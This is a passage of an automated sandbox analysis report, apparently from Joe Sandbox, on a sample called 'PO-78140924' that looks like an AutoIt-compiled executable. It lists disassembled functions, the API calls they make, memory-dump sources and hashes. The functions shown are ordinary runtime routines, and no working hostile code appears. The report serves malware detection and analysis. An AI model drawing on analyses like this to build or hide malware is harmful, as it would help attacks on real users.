                                                • Not Executed
                                                control_flow_graph 283 4822b-48239 284 4826c-48291 GetLastError call 38c87 283->284 285 4823b-4823f 283->285 291 48292-48711 call 38ca8 284->291 285->284 286 48241-4826a call 47e7d 285->286 286->284 292 4829e-482a7 GetFileType 286->292 295 482a9-482dc GetLastError call 38c87 CloseHandle 292->295 295->291 299 482de-482e9 call 38ca8 295->299 299->291
                                                APIs
                                                • ___createFile.LIBCMT ref: 0004825C
                                                  • Part of subcall function 00047E7D: ___crtIsPackagedApp.LIBCMT ref: 00047E83
                                                  • Part of subcall function 00047E7D: GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 00047E96
                                                  • Part of subcall function 00047E7D: GetProcAddress.KERNEL32(00000000), ref: 00047E9D
                                                • GetLastError.KERNEL32 ref: 00048285
                                                • __dosmaperr.LIBCMT ref: 0004828C
                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 0004829F
                                                • GetLastError.KERNEL32 ref: 000482C2
                                                • __dosmaperr.LIBCMT ref: 000482CB
                                                • CloseHandle.KERNEL32(?), ref: 000482D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorFileHandleLast__dosmaperr$AddressCloseModulePackagedProcType___create___crt
                                                • String ID:
                                                • API String ID: 569456945-0
                                                • Opcode ID: 82dbe3574d4547b1d39d6bbb2bac601426092349e609d657de8e8a41d107f031
                                                • Instruction ID: e5b74e7c627e2766821de8d77573bd7cc2fd7d0e9175b97b57a23fc5b7dde1b0
                                                • Opcode Fuzzy Hash: 82dbe3574d4547b1d39d6bbb2bac601426092349e609d657de8e8a41d107f031
                                                • Instruction Fuzzy Hash: C31121B1A11202AFEB199F74CC18ABD7B64FF01310F14CA68F922D72E2DB798900CB10
                                                Function 000139E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 302 139e7-13a57 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00013A15
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00013A36
                                                • ShowWindow.USER32(00000000), ref: 00013A4A
                                                • ShowWindow.USER32(00000000), ref: 00013A53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 15022c72a952f6d19c10a8fa0ea54bf5b853e4afb9db25208cd2926aac2c3225
                                                • Instruction ID: 74352f46fedf632a16e21f017fff7c2533581e3fb47ac5e8a5c2bbde16fc9cae
                                                • Opcode Fuzzy Hash: 15022c72a952f6d19c10a8fa0ea54bf5b853e4afb9db25208cd2926aac2c3225
                                                • Instruction Fuzzy Hash: 5BF03A706022907EFA305723AC48E7B2F7DE7CBF52B00002BBD00E2170C2690804DAB0
                                                Function 0003558D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 362 3558d-355a6 363 355c3 362->363 364 355a8-355ad 362->364 366 355c5-355cb 363->366 364->363 365 355af-355b1 364->365 367 355b3-355b8 call 38ca8 365->367 368 355cc-355d1 365->368 379 355be call 38f36 367->379 370 355d3-355dd 368->370 371 355df-355e3 368->371 370->371 373 35603-35612 370->373 374 355f3-355f5 371->374 375 355e5-355f0 call 32f60 371->375 377 35614-35617 373->377 378 35619 373->378 374->367 376 355f7-35601 374->376 375->374 376->367 376->373 381 3561e-35623 377->381 378->381 379->363 384 35629-35630 381->384 385 3570c-3570f 381->385 386 35632-3563a 384->386 387 35671-35673 384->387 385->366 386->387 388 3563c 386->388 389 35675-35677 387->389 390 356dd-356de call 40d27 387->390 394 35642-35644 388->394 395 3573a 388->395 391 3569b-356a6 389->391 392 35679-35681 389->392 398 356e3-356e7 390->398 399 356aa-356ad 391->399 400 356a8 391->400 396 35683-3568f 392->396 397 35691-35695 392->397 401 35646-35648 394->401 402 3564b-35650 394->402 403 3573e-35747 395->403 404 35697-35699 396->404 397->404 398->403 405 356e9-356ee 398->405 406 35714-35718 399->406 407 356af-356bb call 34856 call 40fdb 399->407 400->399 401->402 402->406 408 35656-3566f call 40e48 402->408 403->366 404->399 405->406 409 356f0-35701 405->409 410 3572a-35735 call 38ca8 406->410 411 3571a-35727 call 32f60 406->411 423 356c0-356c5 407->423 422 356d2-356db 408->422 414 35704-35706 409->414 410->379 411->410 414->384 414->385 422->414 424 356cb-356ce 423->424 425 3574c-35750 423->425 424->395 426 356d0 424->426 425->403 426->422
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: 10ea7c398250f42e3abf275e74b38cff49161a40c8c6da5cc05fb6bc3dafebfc
                                                • Instruction ID: 706141bfe0ee2e1f3bf2bec61d491c1168d0537de086352a121317787bf0f70d
                                                • Opcode Fuzzy Hash: 10ea7c398250f42e3abf275e74b38cff49161a40c8c6da5cc05fb6bc3dafebfc
                                                • Instruction Fuzzy Hash: 5C51C370A04F05DBDB268F69DC856AE77FAAF40322F248729F825972E1D7709E508B40
                                                Function 000135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 427 135b0-135bb 428 135bd-135c2 427->428 429 1362f-13631 427->429 428->429 431 135c4-135dc RegOpenKeyExW 428->431 430 13620-13625 429->430 431->429 432 135de-135fd RegQueryValueExW 431->432 433 13614-1361f RegCloseKey 432->433 434 135ff-1360a 432->434 433->430 435 13626-1362d 434->435 436 1360c-1360e 434->436 437 13612 435->437 436->437 437->433
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000135A1,SwapMouseButtons,00000004,?), ref: 000135D4
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000135A1,SwapMouseButtons,00000004,?,?,?,?,00012754), ref: 000135F5
                                                • RegCloseKey.KERNELBASE(00000000,?,?,000135A1,SwapMouseButtons,00000004,?,?,?,?,00012754), ref: 00013617
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: d6abaa41e62cc98603d4783198e1e09cf425956c6b695b901331795a11f7830e
                                                • Instruction ID: fd4f7bdd20d2bcacbc9fee09d448ebc059ae9052a8db7f7d5656c692069efb2f
                                                • Opcode Fuzzy Hash: d6abaa41e62cc98603d4783198e1e09cf425956c6b695b901331795a11f7830e
                                                • Instruction Fuzzy Hash: 9F1115B5615218BFEB208F64DC84AFFBBBCEF44740F11856AE805D7210E6719E949BA0
                                                Function 00014DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 614 14dd0-14df1 call 30f36 call 1538e 619 14df3-14e0d 614->619 619->619 620 14e0f-14e26 call 30fc0 619->620 623 14ee1-14ee7 620->623 624 14e2c-14e3a call 15027 620->624 625 14f21-14f26 call 799c4 623->625 626 14ee9 call 14fe9 623->626 633 14e40-14e44 624->633 625->624 632 14eee 626->632 632->624 634 14f2b-14f30 633->634 635 14e4a 633->635 636 14e4f-14e64 call 1506b 634->636 635->636 639 14e66-14e6d 636->639 640 14ec9 636->640 642 14e9f-14ea3 639->642 643 14e6f-14e72 639->643 641 14ece-14ede call 15371 640->641 642->640 646 14ea5-14eba call 15045 642->646 645 14e75-14e77 643->645 648 14e80-14e88 645->648 646->633 650 14e8a-14e8d 648->650 651 14ebc-14ec4 648->651 655 14e93-14e97 650->655 656 4dc00-4dc2c call 15045 call 1506b 650->656 653 14ef3-14efa 651->653 654 14ec6-14ec7 651->654 658 14f01-14f09 653->658 659 14efc-14eff 653->659 654->650 655->645 660 14e99-14e9c 655->660 669 4dc2e-4dc33 656->669 670 4dc38-4dc3a 656->670 662 14f35-14f38 658->662 663 14f0b-14f13 658->663 659->650 660->642 662->650 665 14f19-14f1c 663->665 666 4dbef-4dbf5 663->666 665->650 666->648 667 4dbfb 666->667 667->650 669->641 670->641
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: AU3!P/$EA06
                                                • API String ID: 4104443479-4224917454
                                                • Opcode ID: 0c7353bed492ce15bcabcc9ff3a8ea80b167e943cfe08ad879ad8cdae1083e00
                                                • Instruction ID: fd8b2585aeeb946faa90fc2da3d62447d0c4b3d9544c4f09225dafb4906b31dd
                                                • Opcode Fuzzy Hash: 0c7353bed492ce15bcabcc9ff3a8ea80b167e943cfe08ad879ad8cdae1083e00
                                                • Instruction Fuzzy Hash: 41418D71A041589BCF329B64CCA1BFE7FE6AB45300F284075FC829B2A3C6218DC587E1
                                                Function 00078E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: ec6dd20e648924f361f8044ec6ec1334e60bf9b601263cbfbc3d9b148dd934fb
                                                • Instruction ID: fa94c816353d5d77a5627f7226d1e816e01a770ff4da9607483c3c2c995289a1
                                                • Opcode Fuzzy Hash: ec6dd20e648924f361f8044ec6ec1334e60bf9b601263cbfbc3d9b148dd934fb
                                                • Instruction Fuzzy Hash: 78012D71C042187EDB29C7A8CC16EFE7BFCDB01301F00859EF556D2181E9B4E6088760
                                                Function 00030F36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0003588C: __FF_MSGBANNER.LIBCMT ref: 000358A3
                                                  • Part of subcall function 0003588C: __NMSG_WRITE.LIBCMT ref: 000358AA
                                                  • Part of subcall function 0003588C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001), ref: 000358CF
                                                • std::exception::exception.LIBCMT ref: 00030F6C
                                                • __CxxThrowException@8.LIBCMT ref: 00030F81
                                                  • Part of subcall function 0003871B: RaiseException.KERNEL32(?,?,?,000C9E78,?,?,?,?,?,00030F86,?,000C9E78,?,00000001), ref: 00038770
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID: bad allocation
                                                • API String ID: 3902256705-2104205924
                                                • Opcode ID: c93d67d4f537b514b8a6a21809ef751b161d82f6512c0904c78ae1a3c744f03d
                                                • Instruction ID: 6afcb2e63f3fd1b58f62c9943ddf5baf8454140049efab8ec138917b812a3367
                                                • Opcode Fuzzy Hash: c93d67d4f537b514b8a6a21809ef751b161d82f6512c0904c78ae1a3c744f03d
                                                • Instruction Fuzzy Hash: 1CF0A4315053196ACB22ABD8EC16ADE7BEC9F01311F1044B5F908A6993DF708A9486D1
                                                Function 000348D1 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __flush__write_memmove
                                                • String ID:
                                                • API String ID: 1671952623-0
                                                • Opcode ID: b0638cb3213e93c6f434489765cdd88db8f4f2faa4d4b312fa2b0d90ec4d6742
                                                • Instruction ID: 30c8dd4075b1674f3a55bd48755ed0e1eac5577458c22d31ae25075e509b604b
                                                • Opcode Fuzzy Hash: b0638cb3213e93c6f434489765cdd88db8f4f2faa4d4b312fa2b0d90ec4d6742
                                                • Instruction Fuzzy Hash: 97218634B046069BDF6A8F69C8C06AEBBEEAF40354F24857EE455CA640D670FD418B40
                                                Function 0003588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 000358A3
                                                  • Part of subcall function 0003A2EB: __NMSG_WRITE.LIBCMT ref: 0003A312
                                                  • Part of subcall function 0003A2EB: __NMSG_WRITE.LIBCMT ref: 0003A31C
                                                • __NMSG_WRITE.LIBCMT ref: 000358AA
                                                  • Part of subcall function 0003A348: GetModuleFileNameW.KERNEL32(00000000,000D33BA,00000104,00000000,00000000,?), ref: 0003A3DA
                                                  • Part of subcall function 0003A348: ___crtMessageBoxW.LIBCMT ref: 0003A488
                                                  • Part of subcall function 0003321F: ___crtCorExitProcess.LIBCMT ref: 00033225
                                                  • Part of subcall function 0003321F: ExitProcess.KERNEL32 ref: 0003322E
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                • RtlAllocateHeap.NTDLL(01450000,00000000,00000001), ref: 000358CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: d874d682571918b673b97564a070394fa18e191de3bdcda0c08304aeb41a37b5
                                                • Instruction ID: 0c67fce38f88048d05fd703cbc23f1441e5f547c7db225524aaeefb3b02d7dd2
                                                • Opcode Fuzzy Hash: d874d682571918b673b97564a070394fa18e191de3bdcda0c08304aeb41a37b5
                                                • Instruction Fuzzy Hash: 7A019E31251B169AE6272779EC42AAEB39CEF82762F100536F901AB1A2DE749E404771
                                                Function 0001416C Relevance: 4.5, APIs: 3, Instructions: 42windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0001418D
                                                  • Part of subcall function 0001463E: _wcsncpy.LIBCMT ref: 00014652
                                                • _wcscpy.LIBCMT ref: 000141E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000141F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell__memset_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 890625446-0
                                                • Opcode ID: bfdbd817e7bf76624888850e8fd5a3dcda3b566ae727dd9e1c6756c757413dee
                                                • Instruction ID: f032ab11d8b7a9559726ed9a4f630e7da9a64b95768ea04fc8b90c0e05e3bc1b
                                                • Opcode Fuzzy Hash: bfdbd817e7bf76624888850e8fd5a3dcda3b566ae727dd9e1c6756c757413dee
                                                • Instruction Fuzzy Hash: C301B5711083454FD322DF50D841BDBBBECBF85304F14455EF58986182DB345149CB92
                                                Function 00014205 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0001418D
                                                  • Part of subcall function 0001463E: _wcsncpy.LIBCMT ref: 00014652
                                                • _wcscpy.LIBCMT ref: 000141E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000141F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell__memset_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 890625446-0
                                                • Opcode ID: 2e3f11fd8a75bb31bc15495db7048f44603dc30a98e4fbfbd75a0417f3f69c40
                                                • Instruction ID: b7d19ffd4b811ded410ba7dc866371905f444790a7cf2661521286abb18b095f
                                                • Opcode Fuzzy Hash: 2e3f11fd8a75bb31bc15495db7048f44603dc30a98e4fbfbd75a0417f3f69c40
                                                • Instruction Fuzzy Hash: 5D01AD720083049FD221EF94D882BDFB3ECEF88304F10491EF68987142DB3492498B92
                                                Function 00078DB6 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00078DC4
                                                  • Part of subcall function 00032ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EE9
                                                  • Part of subcall function 00032ED5: GetLastError.KERNEL32(00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EFB
                                                • _free.LIBCMT ref: 00078DD5
                                                • _free.LIBCMT ref: 00078DE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 02b64992f98845047382d44b8847b9cc0d57862b7b6657c0d704007a48bffac4
                                                • Instruction ID: cfec849c0353807c81ed75ae5a8aa92029b8c60ce2be31b04c49682d10da749f
                                                • Opcode Fuzzy Hash: 02b64992f98845047382d44b8847b9cc0d57862b7b6657c0d704007a48bffac4
                                                • Instruction Fuzzy Hash: 01E012B1B416015BCA7465796949ED313DC5F58361B14481EB41DD7583CE28EC818238
                                                Function 00013C4B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00013C81
                                                  • Part of subcall function 000144CB: _memset.LIBCMT ref: 000144F7
                                                  • Part of subcall function 000144CB: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00014527
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
